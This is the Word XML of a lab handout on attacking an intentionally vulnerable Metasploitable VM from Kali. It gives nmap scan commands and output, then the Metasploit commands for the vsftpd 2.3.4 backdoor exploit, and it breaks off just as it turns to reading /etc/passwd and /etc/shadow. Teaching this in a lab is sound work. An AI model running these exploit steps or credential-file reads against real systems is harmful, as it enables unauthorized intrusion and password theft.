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D306C" w14:textId="77777777" w:rsidR="007E561D" w:rsidRDefault="007E561D" w:rsidP="007E561D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Using the Metasploit Framework on Kali to Attack  Metasploitable Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B76A16" w14:textId="2F2F1552" w:rsidR="007E561D" w:rsidRDefault="00E57B89">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="16B4A2FD" wp14:editId="3C51A828">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>902970</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3531235" cy="3048000"/>
                <wp:effectExtent l="0" t="0" r="12065" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="14" name="Group 14"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3531235" cy="3048000"/>
                          <a:chOff x="2076525" y="1"/>
                          <a:chExt cx="3531364" cy="3048535"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="15" name="Rectangle 15"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2076525" y="1"/>
                            <a:ext cx="3531364" cy="3048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8D5A6" w14:textId="44533A1C" w:rsidR="00E57B89" w:rsidRDefault="00E57B89" w:rsidP="00E57B89">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="52"/>
                                </w:rPr>
                                <w:t xml:space="preserve">          Ubuntu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3448176" y="515706"/>
                            <a:ext cx="1925793" cy="17325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691DD7" w14:textId="77777777" w:rsidR="00E57B89" w:rsidRPr="00BD757F" w:rsidRDefault="00E57B89" w:rsidP="00E57B89">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AAA776" w14:textId="77777777" w:rsidR="00E57B89" w:rsidRDefault="00E57B89" w:rsidP="00E57B89">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bow Connector 18"/>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 name="Rectangle 19"/>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E711FD" w14:textId="77777777" w:rsidR="00E57B89" w:rsidRDefault="00E57B89" w:rsidP="00E57B89">
                              <w:pPr>
                                <w:jc w:val="center"/>
                              </w:pPr>
                              <w:r>
                                <w:t>Metasploitable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CA9F29F" w14:textId="77777777" w:rsidR="00E57B89" w:rsidRPr="007C1C27" w:rsidRDefault="00E57B89" w:rsidP="00E57B89">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16B4A2FD" id="Group 14" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:71.1pt;width:278.05pt;height:240pt;z-index:251659264;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-width-relative:margin" coordorigin="20765" coordsize="35313,3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">
                <v:rect id="Rectangle 15" o:spid="_x0000_s1027" style="position:absolute;left:20765;width:35313;height:30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" fillcolor="#4f81bd [3204]" strokecolor="#243f60 [1604]" strokeweight="2pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="2A38D5A6" w14:textId="44533A1C" w:rsidR="00E57B89" w:rsidRDefault="00E57B89" w:rsidP="00E57B89">
                        <w:r>
                          <w:rPr>
                            <w:sz w:val="52"/>
                          </w:rPr>
                          <w:t xml:space="preserve">          Ubuntu    </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 16" o:spid="_x0000_s1028" style="position:absolute;left:34481;top:5157;width:19258;height:17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" fillcolor="#c0504d [3205]" strokecolor="#622423 [1605]" strokeweight="2pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="61691DD7" w14:textId="77777777" w:rsidR="00E57B89" w:rsidRPr="00BD757F" w:rsidRDefault="00E57B89" w:rsidP="00E57B89">
                        <w:pPr>
                          <w:jc w:val="center"/>
                          <w:rPr>
                            <w:sz w:val="44"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r w:rsidRPr="00BD757F">
                          <w:rPr>
                            <w:sz w:val="44"/>
                          </w:rPr>
                          <w:t>VirtualBox</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 17" o:spid="_x0000_s1029"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" fillcolor="#f79646 [3209]" strokecolor="#974706 [1609]" strokeweight="2pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="18AAA776" w14:textId="77777777" w:rsidR="00E57B89" w:rsidRDefault="00E57B89" w:rsidP="00E57B89">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0"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" adj="84747" strokecolor="black [3200]" strokeweight="2pt">
                  <v:stroke startarrow="block" endarrow="block"/>
                  <v:shadow on="t" color="black" opacity="22937f" origin=",.5" offset="0,.63889mm"/>
                </v:shape>
                <v:rect id="Rectangle 19" o:spid="_x0000_s1031"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" fillcolor="black [3200]" strokecolor="black [1600]" strokeweight="2pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="65E711FD" w14:textId="77777777" w:rsidR="00E57B89" w:rsidRDefault="00E57B89" w:rsidP="00E57B89">
                        <w:pPr>
                          <w:jc w:val="center"/>
                        </w:pPr>
                        <w:r>
                          <w:t>Metasploitable</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 20" o:spid="_x0000_s1032"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" fillcolor="#cdddac [1622]" strokecolor="#94b64e [3046]">
                  <v:fill color2="#f0f4e6 [502]" rotate="t" angle="180" colors="0 #dafda7;22938f #e4fdc2;1 #f5ffe6" focus="100%" type="gradient"/>
                  <v:shadow on="t" color="black" opacity="24903f" origin=",.5" offset="0,.55556mm"/>
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="6CA9F29F" w14:textId="77777777" w:rsidR="00E57B89" w:rsidRPr="007C1C27" w:rsidRDefault="00E57B89" w:rsidP="00E57B89">
                        <w:pPr>
                          <w:jc w:val="center"/>
                          <w:rPr>
                            <w:sz w:val="32"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r w:rsidRPr="007C1C27">
                          <w:rPr>
                            <w:sz w:val="32"/>
                          </w:rPr>
                          <w:t>Kali</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shapetype id="_x0000_t32" coordsize="21600,21600" o:spt="32" o:oned="t" path="m,l21600,21600e" filled="f">
                  <v:path arrowok="t" fillok="f" o:connecttype="none"/>
                  <o:lock v:ext="edit" shapetype="t"/>
                </v:shapetype>
                <v:shape id="Straight Arrow Connector 22" o:spid="_x0000_s1033"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" strokecolor="black [3200]" strokeweight="3pt">
                  <v:stroke endarrow="block"/>
                  <v:shadow on="t" color="black" opacity="22937f" origin=",.5" offset="0,.63889mm"/>
                </v:shape>
                <v:shape id="Straight Arrow Connector 24" o:spid="_x0000_s1034"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" strokecolor="black [3200]" strokeweight="3pt">
                  <v:stroke endarrow="block"/>
                  <v:shadow on="t" color="black" opacity="22937f" origin=",.5" offset="0,.63889mm"/>
                </v:shape>
                <w10:wrap anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="007E561D">
        <w:t>For the following to work, we must have a network between our VMs.  This requires ensuring that VirtualBox has a Host Only network in place, the servers (Kali and Metasploitable) must have an adapter on this network, with Promiscuous Mode set to Allow All.  This allows us to communicate between the VMs directly, and not through NAT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C9F5DB" w14:textId="7A7D2CDD" w:rsidR="00E57B89" w:rsidRDefault="00E57B89"/>
    <w:p w14:paraId="6060BD07" w14:textId="57E498FD" w:rsidR="00E57B89" w:rsidRDefault="00E57B89"/>
    <w:p w14:paraId="77CE0437" w14:textId="358497CF" w:rsidR="00E57B89" w:rsidRDefault="00E57B89"/>
    <w:p w14:paraId="3AC0B458" w14:textId="0DD36D23" w:rsidR="00E57B89" w:rsidRDefault="00E57B89"/>
    <w:p w14:paraId="030E910A" w14:textId="60DEDE62" w:rsidR="00E57B89" w:rsidRDefault="00E57B89"/>
    <w:p w14:paraId="610646D2" w14:textId="77777777" w:rsidR="00E57B89" w:rsidRDefault="00E57B89"/>
    <w:p w14:paraId="3E22FB41" w14:textId="77777777" w:rsidR="00E57B89" w:rsidRDefault="00E57B89"/>
    <w:p w14:paraId="2D10527F" w14:textId="77777777" w:rsidR="00E57B89" w:rsidRDefault="00E57B89"/>
    <w:p w14:paraId="4CA451B5" w14:textId="77777777" w:rsidR="00E57B89" w:rsidRDefault="00E57B89"/>
    <w:p w14:paraId="562A2777" w14:textId="77777777" w:rsidR="00E57B89" w:rsidRDefault="00E57B89"/>
    <w:p w14:paraId="686FE9CF" w14:textId="0ED10C44" w:rsidR="007E561D" w:rsidRPr="007E561D" w:rsidRDefault="00790561">
      <w:r>
        <w:t>Ensure eth1 is connected</w:t>
      </w:r>
      <w:r w:rsidR="007E561D">
        <w:t xml:space="preserve">.  IP address should be something like 192.168.56.101, .102, .103, etc.  Determine the IP addresses of your </w:t>
      </w:r>
      <w:r w:rsidR="00355CE4">
        <w:t>VM</w:t>
      </w:r>
      <w:r w:rsidR="007E561D">
        <w:t xml:space="preserve"> at this time.  For our purposes, we will assume the IP of the Kali </w:t>
      </w:r>
      <w:r w:rsidR="00355CE4">
        <w:t xml:space="preserve">Ubuntu VM </w:t>
      </w:r>
      <w:r w:rsidR="007E561D">
        <w:t>is 192.168.56.</w:t>
      </w:r>
      <w:r w:rsidR="00242E5E">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="007E561D">
        <w:t>, and the IP address of our target machine</w:t>
      </w:r>
      <w:r w:rsidR="00355CE4">
        <w:t xml:space="preserve"> running in VirtualBox</w:t>
      </w:r>
      <w:r w:rsidR="007E561D">
        <w:t xml:space="preserve">, the one we wish to attack, is </w:t>
      </w:r>
      <w:r w:rsidR="00242E5E">
        <w:t xml:space="preserve">likely </w:t>
      </w:r>
      <w:r w:rsidR="007E561D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>192.168.56.101</w:t>
      </w:r>
      <w:r w:rsidR="007E561D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28698829" w14:textId="77777777" w:rsidR="007E561D" w:rsidRDefault="007E561D" w:rsidP="007E561D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Attacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73995E30" w14:textId="77777777" w:rsidR="00790561" w:rsidRDefault="00790561">
      <w:r>
        <w:t xml:space="preserve">First </w:t>
      </w:r>
      <w:r w:rsidR="007E561D">
        <w:t xml:space="preserve">run nmap. </w:t>
      </w:r>
      <w:r w:rsidR="00324F57">
        <w:t>nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007E561D">
        <w:t xml:space="preserve">is, as the name implies, a networking mapping tool.  It can be used to map out IP addresses and ports in use.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBF5AB6" w14:textId="77777777" w:rsidR="00D604BC" w:rsidRDefault="00D604BC">
      <w:r>
        <w:t>First, even though we know the address of our metasploitable server, let’s scan for it.  Based on Kali’s IP address of 192.168.56.102, we will scan all hosts on the 192.168.56.0/24 network, with the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1107DAF3" w14:textId="77777777" w:rsidR="00D604BC" w:rsidRPr="00324F57" w:rsidRDefault="00D604BC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324F57">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>nmap 192.168.56.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75676627" w14:textId="130CEDE7" w:rsidR="00D604BC" w:rsidRDefault="00D604BC">
      <w:r>
        <w:t>This will likely return that it has found 4 live IP addresses, 192.168.56.1, the gateway address for this segment of our virtual network, 192.168.56.100, the IP for the DHCP server, and 192.168.56.101, the IP for the metasploitable server</w:t>
      </w:r>
      <w:r w:rsidR="00242E5E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC6EA1F" w14:textId="77777777" w:rsidR="00D604BC" w:rsidRDefault="00D604BC">
      <w:r>
        <w:t xml:space="preserve">It will also return the list of services running on that machine, but we can scan the IP specifically, and list in greater detail </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1055CA" w14:textId="45CE6D4E" w:rsidR="00D604BC" w:rsidRDefault="00D604BC">
      <w:r>
        <w:t>We can now scan, in greater detail all ports and any extra info we can get with a simple port scan of the metasploitable server.  Execute</w:t>
      </w:r>
      <w:r w:rsidR="00242E5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00242E5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>one of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD2895A" w14:textId="77777777" w:rsidR="00242E5E" w:rsidRPr="00324F57" w:rsidRDefault="00242E5E" w:rsidP="00242E5E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324F57">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>nmap –sV 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B09D2A" w14:textId="77777777" w:rsidR="00242E5E" w:rsidRDefault="00242E5E">
      <w:r>
        <w:t>or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098A3884" w14:textId="193DB24F" w:rsidR="00242E5E" w:rsidRPr="00324F57" w:rsidRDefault="00242E5E" w:rsidP="00242E5E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324F57">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>nmap –</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00324F57">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2785077D" w14:textId="09ECFCF3" w:rsidR="00324F57" w:rsidRDefault="00324F57">
      <w:r>
        <w:t xml:space="preserve">Where: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357CFBFC" w14:textId="77777777" w:rsidR="00324F57" w:rsidRDefault="00324F57" w:rsidP="00324F57">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>nmap is the utility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DBC785" w14:textId="77777777" w:rsidR="00324F57" w:rsidRDefault="00324F57" w:rsidP="00324F57">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>-sV probes for services and version numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B493AB5" w14:textId="7B4D780C" w:rsidR="00324F57" w:rsidRDefault="00324F57" w:rsidP="00324F57">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00242E5E">
        <w:t>A displays more info about the services, if available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435E345B" w14:textId="2E413DCF" w:rsidR="00B048ED" w:rsidRDefault="00324F57">
      <w:r>
        <w:t>This scan may take some time</w:t>
      </w:r>
      <w:r w:rsidR="00242E5E">
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidR="00B048ED">
        <w:t>We will get a list of ports that are open, the service running on that port, and can use this list to start attacking that IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C28AA4D" w14:textId="1E46DEFA" w:rsidR="00DD35D6" w:rsidRDefault="00B048ED">
      <w:r>
        <w:t>We should also start or Metasploit console by opening a new terminal window, and typing msfconsole and hitting enter.  This may take a few seconds to get up and running.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE4CE0D" w14:textId="05FDD7E8" w:rsidR="00DD35D6" w:rsidRDefault="00DD35D6">
      <w:r>
        <w:t>The results look like the following</w:t>
      </w:r>
      <w:r w:rsidR="0020681E">
        <w:t>.  It is a good idea to capture this to something like Notepad so you can easily refer back to it, and include the results in any documentation or reporting you need to do:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262D8ECD"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PORT     STATE SERVICE     VERSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCC20BF" w14:textId="77777777" w:rsidR="00DD35D6" w:rsidRPr="00DD35D6" w:rsidRDefault="00DD35D6" w:rsidP="00DD35D6">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD35D6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>21/tcp   open  ftp         vsftpd 2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1103CB" w14:textId="77777777" w:rsidR="00DD35D6" w:rsidRPr="00DD35D6" w:rsidRDefault="00DD35D6" w:rsidP="00DD35D6">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD35D6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCB7CBA"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23/tcp   open  telnet      Linux telnetd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327CE0AF"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25/tcp   open  smtp        Postfix smtpd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC46FD0"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53/tcp   open  domain      ISC BIND 9.4.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A028163" w14:textId="77777777" w:rsidR="00DD35D6" w:rsidRPr="00DD35D6" w:rsidRDefault="00DD35D6" w:rsidP="00DD35D6">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD35D6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2A9280"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111/tcp  open  rpcbind     2 (RPC #100000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354302AE"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139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CAA04E"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445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0674BB0A"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512/tcp  open  exec        netkit-rsh rexecd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473814EC"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513/tcp  open  login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D87749B"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514/tcp  open  shell       Netkit rshd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6091341A"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1099/tcp open  java-rmi    GNU Classpath grmiregistry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D88A276"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1524/tcp open  bindshell   Metasploitable root shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCD5A9D"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2049/tcp open  nfs         2-4 (RPC #100003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1A1966"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2121/tcp open  ftp         ProFTPD 1.3.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264D01CC"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3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734ABB3C"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5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FDDB9E"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5900/tcp open  vnc         VNC (protocol 3.3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DF08C0"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6000/tcp open  X11         (access denied)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5F8B1D" w14:textId="77777777" w:rsidR="00DD35D6" w:rsidRPr="00DD35D6" w:rsidRDefault="00DD35D6" w:rsidP="00DD35D6">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD35D6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>6667/tcp open  irc         UnrealIRCd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68689772"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8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F86EE4C" w14:textId="77777777"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8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628D683B" w14:textId="46709314" w:rsidR="00DD35D6" w:rsidRPr="00DD35D6" w:rsidRDefault="00DD35D6" w:rsidP="00DD35D6">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD35D6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1A0512" w14:textId="77777777" w:rsidR="00DD35D6" w:rsidRDefault="00DD35D6" w:rsidP="00DD35D6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>VSFTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144146C1" w14:textId="613C5876" w:rsidR="00DD35D6" w:rsidRPr="006111F2" w:rsidRDefault="00DD35D6" w:rsidP="00DD35D6">
      <w:r>
        <w:t xml:space="preserve">Lets look at one of the vulnerabilities that might or might not give us anything, but explain how the Metasploit framework is used.  Lets attack port </w:t>
      </w:r>
      <w:r>
        <w:t>21</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>the vsftp server running version 2.3.4.  When we research this software, we discover there is a vulnerability we can exploit.  The syntax for the exploit looks something like the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27440AF8" w14:textId="77777777" w:rsidR="00DD35D6" w:rsidRPr="00337E4E" w:rsidRDefault="00DD35D6" w:rsidP="00DD35D6">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00337E4E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>msf&gt; use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7865900D" w14:textId="77777777" w:rsidR="00DD35D6" w:rsidRPr="00337E4E" w:rsidRDefault="00DD35D6" w:rsidP="00DD35D6">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00337E4E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>msf&gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B543942" w14:textId="77777777" w:rsidR="00DD35D6" w:rsidRPr="00337E4E" w:rsidRDefault="00DD35D6" w:rsidP="00DD35D6">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00337E4E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>msf&gt; set RHOST 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243BC8D1" w14:textId="77777777" w:rsidR="00DD35D6" w:rsidRDefault="00DD35D6" w:rsidP="00DD35D6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00337E4E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>msf&gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387BB7C1" w14:textId="028A94C8" w:rsidR="00DD35D6" w:rsidRDefault="00DD35D6" w:rsidP="00DD35D6">
      <w:r>
        <w:t>With the above exploit we can test to see if we have gained root access.  Often, you have to repeat commands or steps to achieve your attack.  I often type the whoami command first to see if I am successful:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197A724F" w14:textId="681675EC" w:rsidR="00DD35D6" w:rsidRDefault="00DD35D6" w:rsidP="00DD35D6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68BC6EDC" wp14:editId="12948DF4">
            <wp:extent cx="5943600" cy="3166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6745"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B6C5FC" w14:textId="791973F9" w:rsidR="00DD35D6" w:rsidRDefault="00DD35D6" w:rsidP="00DD35D6">
      <w:r>
        <w:t>With the above, we can review the contents of the /etc/passwd and the /etc/shadow files with the following:</w:t>
      </w:r>
    </w:p>
